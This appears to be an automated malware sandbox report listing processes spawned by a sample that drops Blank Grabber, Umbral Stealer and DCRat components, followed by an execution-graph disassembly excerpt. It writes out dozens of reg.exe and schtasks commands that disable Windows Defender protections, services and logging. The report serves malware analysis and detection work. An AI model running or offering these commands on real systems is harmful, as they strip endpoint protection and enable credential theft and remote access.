                                      Commandline:reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:5
                                      Start time:03:42:06
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:6
                                      Start time:03:42:06
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:7
                                      Start time:03:42:06
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:8
                                      Start time:03:42:06
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:9
                                      Start time:03:42:06
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:10
                                      Start time:03:42:06
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:11
                                      Start time:03:42:06
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:12
                                      Start time:03:42:07
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      General

                                      Target ID:13
                                      Start time:03:42:07
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:14
                                      Start time:03:42:07
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:15
                                      Start time:03:42:07
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:16
                                      Start time:03:42:07
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:17
                                      Start time:03:42:07
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:18
                                      Start time:03:42:07
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:19
                                      Start time:03:42:08
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                      Wow64 process (32bit):true
                                      Commandline:schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                      Imagebase:0x150000
                                      File size:187'904 bytes
                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:20
                                      Start time:03:42:08
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                      Wow64 process (32bit):true
                                      Commandline:schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                      Imagebase:0x150000
                                      File size:187'904 bytes
                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:21
                                      Start time:03:42:08
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                      Wow64 process (32bit):true
                                      Commandline:schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                      Imagebase:0x150000
                                      File size:187'904 bytes
                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:22
                                      Start time:03:42:08
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                      Wow64 process (32bit):true
                                      Commandline:schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                      Imagebase:0x150000
                                      File size:187'904 bytes
                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:23
                                      Start time:03:42:08
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                      Wow64 process (32bit):true
                                      Commandline:schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                      Imagebase:0x150000
                                      File size:187'904 bytes
                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:24
                                      Start time:03:42:08
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:25
                                      Start time:03:42:08
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:26
                                      Start time:03:42:08
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:27
                                      Start time:03:42:08
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:28
                                      Start time:03:42:08
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:29
                                      Start time:03:42:08
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:30
                                      Start time:03:42:08
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:31
                                      Start time:03:42:08
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:32
                                      Start time:03:42:09
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:33
                                      Start time:03:42:09
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                      Imagebase:0x680000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:34
                                      Start time:03:42:09
                                      Start date:30/10/2024
                                      Path:C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exe"
                                      Imagebase:0x400000
                                      File size:7'888'384 bytes
                                      MD5 hash:B76057DF968A944446F950DD4DDC6AEC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000022.00000002.1823074775.0000000001B56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000022.00000002.1824992539.0000000004F70000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000022.00000003.1810385952.0000000001B1E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 83%, ReversingLabs
                                      Has exited:true

                                      General

                                      Target ID:35
                                      Start time:03:42:14
                                      Start date:30/10/2024
                                      Path:C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
                                      Imagebase:0x730000
                                      File size:2'618'108 bytes
                                      MD5 hash:6E01D4882274684F48E04436103AD57F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 66%, ReversingLabs
                                      Has exited:true

                                      General

                                      Target ID:36
                                      Start time:03:42:14
                                      Start date:30/10/2024
                                      Path:C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe"
                                      Imagebase:0x239bb8d0000
                                      File size:235'008 bytes
                                      MD5 hash:06129FFC46E854930CFCAA754CA1D487
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000024.00000000.1810071008.00000239BB8D2000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, Author: Joe Security
                                      • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, Author: Joe Security
                                      • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, Author: ditekSHen
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 84%, ReversingLabs
                                      Has exited:true

                                      General

                                      Target ID:37
                                      Start time:03:42:14
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\wscript.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\blockweb\J6PsSzBYKK7mXTJyYh2Tgne.vbe"
                                      Imagebase:0xd60000
                                      File size:147'456 bytes
                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:38
                                      Start time:03:42:14
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\wscript.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\blockweb\file.vbs"
                                      Imagebase:0xd60000
                                      File size:147'456 bytes
                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:39
                                      Start time:03:42:17
                                      Start date:30/10/2024
                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                      Wow64 process (32bit):false
                                      Commandline:"wmic.exe" csproduct get uuid
                                      Imagebase:0x7ff708a40000
                                      File size:576'000 bytes
                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:40
                                      Start time:03:42:17
                                      Start date:30/10/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:42
                                      Start time:03:42:23
                                      Start date:30/10/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\blockweb\TOdra8QNG4wQEWkSimCHh9eVG.bat" "
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:43
                                      Start time:03:42:23
                                      Start date:30/10/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      General

                                      Target ID:44
                                      Start time:03:42:23
                                      Start date:30/10/2024
                                      Path:C:\blockweb\portrefNet.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\blockweb\portrefNet.exe"
                                      Imagebase:0x40000
                                      File size:2'300'928 bytes
                                      MD5 hash:84C6CB042DC58A109DFA2DB8381BEC28
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000002C.00000002.1947296388.0000000002774000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000002C.00000002.1947296388.0000000002561000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000002C.00000002.1950988676.000000001256F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 88%, ReversingLabs
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:10%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:9.3%
                                        Total number of Nodes:1518
                                        Total number of Limit Nodes:36
                                        execution_graph 24801 745c77 121 API calls __vswprintf_c_l 24804 731075 82 API calls pre_c_initialization 22842 74d573 22843 74d580 22842->22843 22850 73ddd1 22843->22850 22861 73ddff 22850->22861 22853 73400a 22884 733fdd 22853->22884 22856 74ac74 PeekMessageW 22857 74ac8f GetMessageW 22856->22857 22858 74acc8 22856->22858 22859 74acb4 TranslateMessage DispatchMessageW 22857->22859 22860 74aca5 IsDialogMessageW 22857->22860 22859->22858 22860->22858 22860->22859 22867 73d28a 22861->22867 22864 73de22 LoadStringW 22865 73ddfc 22864->22865 22866 73de39 LoadStringW 22864->22866 22865->22853 22866->22865 22872 73d1c3 22867->22872 22869 73d2a7 22871 73d2bc 22869->22871 22880 73d2c8 26 API calls 22869->22880 22871->22864 22871->22865 22873 73d1de 22872->22873 22879 73d1d7 _strncpy 22872->22879 22875 73d202 22873->22875 22881 741596 WideCharToMultiByte 22873->22881 22878 73d233 22875->22878 22882 73dd6b 50 API calls __vsnprintf 22875->22882 22883 7558d9 26 API calls 3 library calls 22878->22883 22879->22869 22880->22871 22881->22875 22882->22878 22883->22879 22885 733ff4 __vswprintf_c_l 22884->22885 22888 755759 22885->22888 22891 753837 22888->22891 22892 753877 22891->22892 22893 75385f 22891->22893 22892->22893 22894 75387f 22892->22894 22915 75895a 20 API calls __dosmaperr 22893->22915 22917 753dd6 22894->22917 22897 753864 22916 758839 26 API calls __cftof 22897->22916 22900 75386f 22908 74ec4a 22900->22908 22903 753907 22926 754186 51 API calls 3 library calls 22903->22926 22904 733ffe SetDlgItemTextW 22904->22856 22907 753912 22927 753e59 20 API calls _free 22907->22927 22909 74ec55 IsProcessorFeaturePresent 22908->22909 22910 74ec53 22908->22910 22912 74f267 22909->22912 22910->22904 22928 74f22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22912->22928 22914 74f34a 22914->22904 22915->22897 22916->22900 22918 753df3 22917->22918 22919 75388f 22917->22919 22918->22919 22929 758fa5 GetLastError 22918->22929 22925 753da1 20 API calls 2 library calls 22919->22925 22921 753e14 22950 7590fa 38 API calls __cftof 22921->22950 22923 753e2d 22951 759127 38 API calls __cftof 22923->22951 22925->22903 22926->22907 22927->22900 22928->22914 22930 758fc7 22929->22930 22931 758fbb 22929->22931 22953 7585a9 20 API calls 2 library calls 22930->22953 22952 75a61b 11 API calls 2 library calls 22931->22952 22934 758fc1 22934->22930 22936 759010 SetLastError 22934->22936 22935 758fd3 22937 758fdb 22935->22937 22960 75a671 11 API calls 2 library calls 22935->22960 22936->22921 22954 7584de 22937->22954 22939 758ff0 22939->22937 22941 758ff7 22939->22941 22961 758e16 20 API calls __dosmaperr 22941->22961 22942 758fe1 22944 75901c SetLastError 22942->22944 22962 758566 38 API calls _abort 22944->22962 22945 759002 22947 7584de _free 20 API calls 22945->22947 22949 759009 22947->22949 22949->22936 22949->22944 22950->22923 22951->22919 22952->22934 22953->22935 22955 758512 __dosmaperr 22954->22955 22956 7584e9 RtlFreeHeap 22954->22956 22955->22942 22956->22955 22957 7584fe 22956->22957 22963 75895a 20 API calls __dosmaperr 22957->22963 22959 758504 GetLastError 22959->22955 22960->22939 22961->22945 22963->22959 24806 74fc60 51 API calls 2 library calls 24808 753460 RtlUnwind 24809 759c60 71 API calls _free 24810 759e60 31 API calls 2 library calls 24853 749b50 GdipDisposeImage GdipFree __except_handler4 24814 758050 8 API calls ___vcrt_uninitialize 24586 739b59 24587 739bd7 24586->24587 24590 739b63 24586->24590 24588 739bad SetFilePointer 24588->24587 24589 739bcd GetLastError 24588->24589 24589->24587 24590->24588 24815 74ec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24816 748c40 GetClientRect 24817 753040 5 API calls 2 library calls 24855 74be49 98 API calls 3 library calls 24818 760040 IsProcessorFeaturePresent 24856 74d34e DialogBoxParamW 24857 74be49 103 API calls 4 library calls 24820 74a430 73 API calls 24821 731025 29 API calls pre_c_initialization 24671 739f2f 24672 739f44 24671->24672 24673 739f3d 24671->24673 24674 739f4a GetStdHandle 24672->24674 24681 739f55 24672->24681 24674->24681 24675 739fa9 WriteFile 24675->24681 24676 739f7a 24677 739f7c WriteFile 24676->24677 24676->24681 24677->24676 24677->24681 24679 73a031 24683 737061 75 API calls 24679->24683 24681->24673 24681->24675 24681->24676 24681->24677 24681->24679 24682 736e18 60 API calls 24681->24682 24682->24681 24683->24673 24865 736110 80 API calls 24866 75b710 GetProcessHeap 24867 74be49 108 API calls 4 library calls 24695 74ea00 24696 74ea08 pre_c_initialization 24695->24696 24713 758292 24696->24713 24698 74ea13 pre_c_initialization 24720 74e600 24698->24720 24700 74ea9c 24728 74ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 24700->24728 24702 74ea28 __RTC_Initialize 24702->24700 24704 74e7a1 pre_c_initialization 29 API calls 24702->24704 24703 74eaa3 ___scrt_initialize_default_local_stdio_options 24705 74ea41 pre_c_initialization 24704->24705 24705->24700 24706 74ea52 24705->24706 24725 74f15b InitializeSListHead 24706->24725 24708 74ea57 pre_c_initialization __except_handler4 24726 74f167 30 API calls 2 library calls 24708->24726 24710 74ea7a pre_c_initialization 24727 758332 38 API calls 3 library calls 24710->24727 24712 74ea85 pre_c_initialization 24714 7582c4 24713->24714 24715 7582a1 24713->24715 24714->24698 24715->24714 24729 75895a 20 API calls 